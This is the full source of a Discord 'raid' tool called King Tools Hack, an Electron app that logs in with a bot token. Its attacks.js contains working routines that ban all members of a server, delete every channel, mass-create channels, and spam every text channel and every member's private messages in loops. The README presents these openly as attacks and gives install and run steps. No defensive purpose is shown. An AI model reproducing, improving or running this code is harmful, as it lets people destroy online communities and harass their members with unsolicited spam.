README.md
# 😏 King Tools Hack V 1.0.0
## 🔎 What is inside 
```Last judgement
Ban all members of a server
This attack is only avaible when the bot has the required permissions.
```

```Spring cleaning
Delete channels
This attack is only avaible when the bot has the required permissions.
```


```Channels Maker
Create channels
This attack is only avaible when the bot has the required permissions.
```

```Channels spammer
Spam messages in channels
This attack send some messages in all text channels of a server. 
```

```Spammer
Send private messages
This attack send a private message to all members of a server, except bots. 
```
<hr>



## 🤔 How To Use?

1. Download and configure [nodejs](https://nodejs.org/en/) if not yet
2. Download the script  (or whit git cmd ```git clone https://github.com/Izox-github/botdiscordhack.git``` )
4. Open powershell/cmd
5. Type this command
    ```sh
    user@user:~/king/tools/hack$ npm install
    ```
6.  Start Program:
    ```sh
    user@user:~/king/tools/hack$ npm start
    ```
    <hr>
    
## 😒 If there is a problem :
1. Check if you have put the correct bot token

## 💛 Thank !
Thank you for using my app!, And I'm proud to make it happen!    ❤


## ⚡ Credits :
By Izox -- https://github.com/Izox-github/



Changelog.md
## 📋 CHANGELOG
- Version has been added for : NPM VERSION 5+/ NODE VERSION 10+/


main.js
// Modules to control application life and create native browser window
const { app, BrowserWindow } = require('electron')
const path = require('path')
const url = require("url")

// Keep a global reference of the window object, if you don't, the window will
// be closed automatically when the JavaScript object is garbage collected.
let mainWindow


function createWindow() {
    // Create the browser window.
    mainWindow = new BrowserWindow({
        webPreferences: {
            preload: path.join(__dirname, 'preload.js'),
            nodeIntegration: true
        },
        
        icon: "./icon.png"
    })

    // and load the index.html of the app.
    mainWindow.loadFile('index.html')
    mainWindow.maximize()
    // Open the DevTools.
    // mainWindow.webContents.openDevTools()

    // Emitted when the window is closed.
    mainWindow.on('closed', function () {
        // Dereference the window object, usually you would store windows
        // in an array if your app supports multi windows, this is the time
        // when you should delete the corresponding element.
        mainWindow = null
    })
}

// This method will be called when Electron has finished
// initialization and is ready to create browser windows.
// Some APIs can only be used after this event occurs.
app.on('ready', createWindow)

// Quit when all windows are closed.
app.on('window-all-closed', function () {
    // On macOS it is common for applications and their menu bar
    // to stay active until the user quits explicitly with Cmd + Q
    if (process.platform !== 'darwin') app.quit()
})

app.on('activate', function () {
    // On macOS it's common to re-create a window in the app when the
    // dock icon is clicked and there are no other windows open.
    if (mainWindow === null) createWindow()
})

// In this file you can include the rest of your app's specific main process
// code. You can also put them in separate files and require them here.


errors.js
class Error {

    constructor() {
        this.type = {
            "TOKEN_ERROR": "The bot's token has expired or it's invalid. Please, connect to <a href=\"https://discordapp.com/developers/applications/\" target=\"_BLANK\">https://www.discordapp.com/developers/applications/</a> and regenerate a new token.",
            "INTERNAL_ERROR": "An internal error occured. Please, restart the app and try again.",
            "EMPTY_MESSAGE": "Can't send an empty message."
        }
    }

    displayError = (err=String) => {
        document.getElementById("error-layer").style.display = "block"
        document.getElementById("error").innerHTML = err
        return 0
    }

    hideError = () => {
        document.getElementById("error-layer").style.display = "none"
        return 0
    }
}

module.exports = new Error


events.js
const Discord = require("discord.js")

class Events {

    constructor(){
        this.selectFreezed = Boolean
    }

    defineFunction = (element , type = "onClick", param = String) => {
        // This remove an attribut which don't take parametters like 'readonly' for <input>
        // or 'control' for <video>

        if (param == false) {
            element.removeAttribute(type)
            return 0

            // This one is juste adding a parametters to a balise with his value like the next schema:
            // <balise attribut="value">...</balise>
        } else {
            element.setAttribute(type, param)
            return 0

        }
    }

    verifPerms = (client = new Discord.Client(), guild = new Discord.Guild(), permission = String) => {
        return !!guild.members.get(client.user.id).hasPermission(permission)
    }

    initSelectors = (client = new Discord.Client()) => {
        const selects = document.getElementsByTagName("select")
        Object.values(selects).forEach((select) => {

            if (select.id == "last-judgement-server-select") {
                let foundedGuild = false

                client.guilds.forEach((guild) => {
                    if (this.verifPerms(client, guild, 4)) {
                        foundedGuild = true
                        const option = document.createElement("option")
                        option.value = guild.id
                        option.innerHTML = guild.name
                        select.appendChild(option)
                    }
                })

                if (!foundedGuild) {
                    const option = document.createElement("option")
                    option.value = "0"
                    option.innerHTML = "NO GUILD FOUNDED"
                    select.disabled = true
                    select.appendChild(option)
                }

            } else if (select.id == "spammer-server-select") {
                let foundedGuild = false

                client.guilds.forEach((guild) => {
                    foundedGuild = true
                    const option = document.createElement("option")
                    option.value = guild.id
                    option.innerHTML = guild.name
                    select.appendChild(option)
                })

                if (!foundedGuild) {
                    const option = document.createElement("option")
                    option.value = "0"
                    option.innerHTML = "NO GUILD FOUNDED"
                    select.disabled = true
                    select.appendChild(option)
                }

            } else if (select.id == "spring-cleaning-server-select" || select.id == "channels-maker-server-select") {
                let foundedGuild = false

                client.guilds.forEach((guild) => {
                    if (this.verifPerms(client, guild, 16)) {
                        foundedGuild = true
                        const option = document.createElement("option")
                        option.value = guild.id
                        option.innerHTML = guild.name
                        select.appendChild(option)
                    }
                })

                if (!foundedGuild) {
                    const option = document.createElement("option")
                    option.value = "0"
                    option.innerHTML = "NO GUILD FOUNDED"
                    select.disabled = true
                    select.appendChild(option)
                }
            } else if (select.id == "channels-spammer-server-select") {
                let foundedGuild = false

                client.guilds.forEach((guild) => {
                    if (this.verifPerms(client, guild, 2048) && this.verifPerms(client, guild, 1024)) {
                        foundedGuild = true
                        const option = document.createElement("option")
                        option.value = guild.id
                        option.innerHTML = guild.name
                        select.appendChild(option)
                    }
                })

                if (!foundedGuild) {
                    const option = document.createElement("option")
                    option.value = "0"
                    option.innerHTML = "NO GUILD FOUNDED"
                    select.disabled = true
                    select.appendChild(option)
                }
            }
        })
    }

    // This makes readonly the cards to not have probleme if the user doesn't put any token
    freezeCards = () => {
        Object.values(document.getElementsByTagName("select")).forEach((select) => {
            this.defineFunction(select, "disabled", true)
        })

        Object.values(document.getElementsByTagName("button")).forEach((button) => {
            if (button.id != "login-bot-btn") this.defineFunction(button, "disabled", true)
        })

        Object.values(document.getElementsByTagName("body")).forEach((select) => {
            this.defineFunction(select, "onselectstart", "return false")
        })

        this.selectFreezed = true
    }

    // This makes enalbe the cards
    unfreezeCards = () => {
        Object.values(document.getElementsByTagName("select")).forEach((select) => {
            this.defineFunction(select, "disabled", false)
        })

        Object.values(document.getElementsByTagName("button")).forEach((button) => {
            if (button.id != "login-bot-btn") this.defineFunction(button, "disabled", false)
        })
        this.selectFreezed = false
    }
}

module.exports = new Events


buttons.js
const errors = require("./errors.js")
const events = require("./events.js")
const Discord = require("discord.js")
class LoginButton {

    loginButtonChange = (value = String) => {
        if (value == "disconnect") {
            document.getElementById("login-bot-btn").innerHTML = "Disconnect"
            document.getElementById("login-bot-btn").setAttribute("onClick", "logoutBot()")
            events.defineFunction(document.getElementById("token-field"), "readOnly", true)
            this.displayBotInformations()
            return 0

        } else if (value == "connect") {
            document.getElementById("login-bot-btn").innerHTML = "Connect"
            document.getElementById("login-bot-btn").setAttribute("onClick", "logButton.loginBot()")
            this.hideBotInformations()
            events.defineFunction(document.getElementById("token-field"), "readOnly", false)
            return 0

        } else {
            errors.displayError(errors.type.INTERNAL_ERROR)
            return 1

        }
    }

    globalButtonFunctionChanger = (buttonID, type = "onClick", func = String) => {
        document.getElementById(buttonID).setAttribute(type, func)
        return 0

    }

    loginBot = (client = new Discord.Client()) => {
        const token = document.getElementById("token-field").value
        client.login(token).then((_) => {
            this.client = client
            this.loginButtonChange("disconnect")
            this.displayBotInformations()
        }).catch((err) => {
            errors.displayError(errors.type.TOKEN_ERROR)
            this.client.destroy().then((_) => {
                return 1
            })
        })
    }

    logoutBot = () => {
        if (this.client) {
            this.client.destroy().then((_) => {
                this.loginButtonChange("connect")
                window.location = window.location
                return 0

            }).catch((_) => {
                errors.displayError(errors.type.INTERNAL_ERROR)
                return 1

            })
        } else {
            errors.displayError(errors.type.INTERNAL_ERROR)
            return 1
        }
    }

    badgePresence = (category) => {
        if (category == "dnd") {
            const spanDND = document.createElement("span")
            spanDND.className = "badge badge-pill badge-danger"
            spanDND.innerHTML = "Do not disturb"
            spanDND.id = "status-bot"
            return spanDND

        } else if (category == "idle") {
            const spanIDLE = document.createElement("span")
            spanIDLE.className = "badge badge-pill badge-warning"
            spanIDLE.innerHTML = "IDLE"
            spanIDLE.id = "status-bot"
            return spanIDLE

        } else if (category == "online") {
            const spanONLINE = document.createElement("span")
            spanONLINE.className = "badge badge-pill badge-success"
            spanONLINE.innerHTML = "Online"
            return spanONLINE

        } else if (category == "offline") {
            const spanONLINE = document.createElement("span")
            spanONLINE.className = "badge badge-pill badge-secondary"
            spanONLINE.innerHTML = "Offline"
            spanONLINE.id = "status-bot"
            return spanONLINE

        }

    }

    displayBotInformations = () => {
        const avatarURL = this.client.user.avatarURL
        const tag = this.client.user.tag
        const serverCount = this.client.guilds.array().length
        const status = this.client.user.presence.status

        let serverWithPermsIndex = 0
        this.client.guilds.forEach((guild) => {
            if (guild.members.get(this.client.user.id).hasPermission("ADMINISTRATOR")) serverWithPermsIndex += 1
        })

        const iconField = document.getElementById("icon-field")
        const linkBotIconRedirect = document.getElementById("redirect-bot-icon")
        const tagField = document.getElementById("tag-field")
        const serverCountField = document.getElementById("server-count-field")
        const serverPermsField = document.getElementById("server-perms-field")
        const statusField = document.getElementById("status-field")

        iconField.src = avatarURL
        iconField.width = "150"
        iconField.height = "150"
        linkBotIconRedirect.href = avatarURL
        tagField.innerHTML = `Username: ${tag}`
        serverCountField.innerHTML = `Servers count: ${serverCount}`
        serverPermsField.innerHTML = `Servers with perms: ${serverWithPermsIndex}`
        statusField.innerHTML = `Status: `
        statusField.append(this.badgePresence(status))

        document.getElementById("bot-infos").style.display = "block"
    }

    hideBotInformations = () => {
        document.getElementById("bot-infos").style.display = "none"
    }

    changeTextButton = (elementID = String, newText = String) => {
        document.getElementById(elementID).innerHTML = newText
        return 0
    }


}

module.exports = new LoginButton


preload.js
// All of the Node.js APIs are available in the preload process.
// It has the same sandbox as a Chrome extension.
window.addEventListener('DOMContentLoaded', () => {
    const replaceText = (selector, text) => {
        const element = document.getElementById(selector)
        if (element) element.innerText = text
    }

    for (const type of['chrome', 'node', 'electron']) {
        replaceText(`${type}-version`, process.versions[type])
    }
})

const Discord = require("discord.js")
const client = new Discord.Client()
const buttons = require("./buttons.js")
const events = require("./events.js")
const errors = require("./errors.js")
const attacks = require("./attacks.js")
attacks.defineClient(client)

window.onload = () => {
    events.freezeCards()
}

loginBot = () => {
    buttons.loginBot(client)
}

logoutBot = () => {
    buttons.logoutBot()
}

springCleaning = async() => {
    const guildID = document.getElementById("spring-cleaning-server-select").value
    attacks.springCleaningAttack = true
    await stopChannelsMaker()
    return await attacks.springCleaning(guildID)
}

stopSpringCleaning = async() => {
    attacks.springCleaningAttack = false
    return 0
}

channelsMaker = async () => {
    const guildID = document.getElementById("channels-maker-server-select").value
    const channelsName = document.getElementById("channels-maker-name").value

    attacks.channelsMakerAttack = true
    await stopSpringCleaning()
    return await attacks.channelsMaker(guildID, channelsName)
}

stopChannelsMaker = async () => {
    attacks.channelsMakerAttack = false
    return 0
}

lastJudgement = async () => {
    const guildID = document.getElementById("last-judgement-server-select").value
    attacks.lastJudgementAttack = true
    return await attacks.lastJudgement(guildID)
}

reviewJudgement = async() => {
    attacks.lastJudgementAttack = false
    return 0
}

spammer = async() => {
    const guildID = document.getElementById("spammer-server-select").value
    const messageContent = document.getElementById("spammer-message-content").value

    attacks.spammerAttack = true
    return await attacks.spammer(guildID, messageContent)
}

stopChannelSpammer = async() => {
    attacks.spammerAttack = false
    return 0
}

channelsSpammer = async() => {
    const guildID = document.getElementById("channels-spammer-server-select").value
    const messageContent = document.getElementById("channels-spammer-message-content").value

    attacks.channelsSpammerAttack = true
    return await attacks.channelsSpammer(guildID, messageContent)

}

stopChannelsSpammer = async() => {
    attacks.channelsSpammerAttack = false
    return 0
}

client.once("ready", () => {
    if (document.getElementById("error-layer").style.display == "block") errors.hideError() 
    events.initSelectors(client)
    if (events.selectFreezed) events.unfreezeCards()
    return 0
})


attacks.js
const Discord = require("discord.js")
const buttons = require("./buttons.js")
const errors = require("./errors.js")

class Attacks {

    constructor() {
        this.channelsMakerAttack = false
        this.springCleaningAttack = false
        this.lastJudgementAttack = false
        this.spammerAttack = false
        this.channelsSpammerAttack = false

    }

    defineClient(client = new Discord.Client()) {
        this.client = client
    }

    verifClientExists() {
        return !!this.client
    }

    clientHasPermissions(guild = new Discord.Guild(), permission = String) {
        return !!guild.members.get(this.client.user.id).hasPermission(permission)
    }

    async lastJudgement(guildID = new Discord.Guild().id) {
        if (this.verifClientExists()) {
            buttons.changeTextButton("last-judgement-btn", "Press to stop...")
            buttons.globalButtonFunctionChanger("last-judgement-btn", "onClick", "reviewJudgement()")

            const guild = this.client.guilds.get(guildID)
            if (this.clientHasPermissions(guild, 4)) {
                guild.members.forEach(async (member) => {
                    if (!this.lastJudgementAttack) {
                        buttons.changeTextButton("last-judgement-btn", "Start attack")
                        buttons.globalButtonFunctionChanger("last-judgement-btn", "onClick", "lastJudgement()")
                        return 0
                    }
                    if (member.bannable) await member.ban()
                })
                buttons.changeTextButton("last-judgement-btn", "Start attack")
                buttons.globalButtonFunctionChanger("last-judgement-btn", "onClick", "lastJudgement()")
                return 0
            }
        }
        return 1
    }

    async springCleaning(guildID = new Discord.Guild().id) {
        if (this.verifClientExists()) {
            const guild = this.client.guilds.get(guildID)

            if (this.clientHasPermissions(guild, 16)) {
                buttons.changeTextButton("spring-cleaning-btn", "Press to stop...")
                buttons.globalButtonFunctionChanger("spring-cleaning-btn", "onClick", "stopSpringCleaning()")


                guild.channels.forEach(async (channel) => {
                    await channel.delete()
                })
                buttons.changeTextButton("spring-cleaning-btn", "Start attack")
                buttons.globalButtonFunctionChanger("spring-cleaning-btn", "onClick", "springCleaning()")
                return 0
            }
        }
        return 1
    }

    async channelsMaker(guildID = new Discord.Guild().id, channelsName = String) {
        if (this.verifClientExists()) {
            const guild = this.client.guilds.get(guildID)
            if (this.clientHasPermissions(guild, 16)) {
                buttons.changeTextButton("channels-maker-btn", "Press to stop...")
                buttons.globalButtonFunctionChanger("channels-maker-btn", "onClick", "stopChannelsMaker()")
                const maxRange = Math.abs(500 - guild.channels.array().length)

                let index = 0
                setInterval(async () => {
                    if (index == maxRange || !this.channelsMakerAttack) {
                        buttons.changeTextButton("channels-maker-btn", "Start attack")
                        buttons.globalButtonFunctionChanger("channels-maker-btn", "onClick", "channelsMaker()")

                        return 0
                    }
                    await guild.createChannel(channelsName, { type: "text", permissionOverwrites: 0 })
                    index += 1

                }, 300)
            }
        }

        return 1
    }

    async spammer(guildID = new Discord.Guild().id, messageContent = String) {
        if (this.verifClientExists()) {

            if (messageContent.replace(" ", "") == "") {
                errors.displayError(errors.type.EMPTY_MESSAGE)
                return 1
            }

            errors.hideError()

            const guild = this.client.guilds.get(guildID)
            buttons.changeTextButton("spammer-btn", "Press to stop...")
            buttons.globalButtonFunctionChanger("spammer-btn", "onClick", "stopSpammer()")

            setInterval(async () => {
                guild.members.forEach(async (member) => {
                    setTimeout(async () => {
                        if (!this.spammerAttack) {
                            buttons.changeTextButton("spammer-btn", "Start attack")
                            buttons.globalButtonFunctionChanger("spammer-btn", "onClick", "spammer()")
                            return 0
                        }
                        if (!member.user.bot) await member.send(messageContent)
                    }, 225)
                })
            }, 225)
        }

        return 1
    }

    async channelsSpammer(guildID = new Discord.Guild().id, messageContent = String) {
        if (this.verifClientExists()) {

            if (messageContent.replace(" ", "") == "") {
                errors.displayError(errors.type.EMPTY_MESSAGE)
                return 1
            }

            errors.hideError()

            const guild = this.client.guilds.get(guildID)
            if (this.clientHasPermissions(guild, 2048) && this.clientHasPermissions(guild, 1024)) {
                buttons.changeTextButton("channels-spammer-btn", "Press to stop...")
                buttons.globalButtonFunctionChanger("channels-spammer-btn", "onClick", "stopChannelsSpammer()")

                setInterval(async () => {
                    guild.channels.forEach(async (channel) => {
                        if (!this.channelsSpammerAttack) {
                            buttons.changeTextButton("channels-spammer-btn", "Start attack")
                            buttons.globalButtonFunctionChanger("channels-spammer-btn", "onClick", "channelsSpammer()")
                            return 0
                        }
                        if (channel.type == "text") await channel.send(messageContent)

                    })
                }, 350)
            }
        }
        return 1
    }

}

module.exports = new Attacks

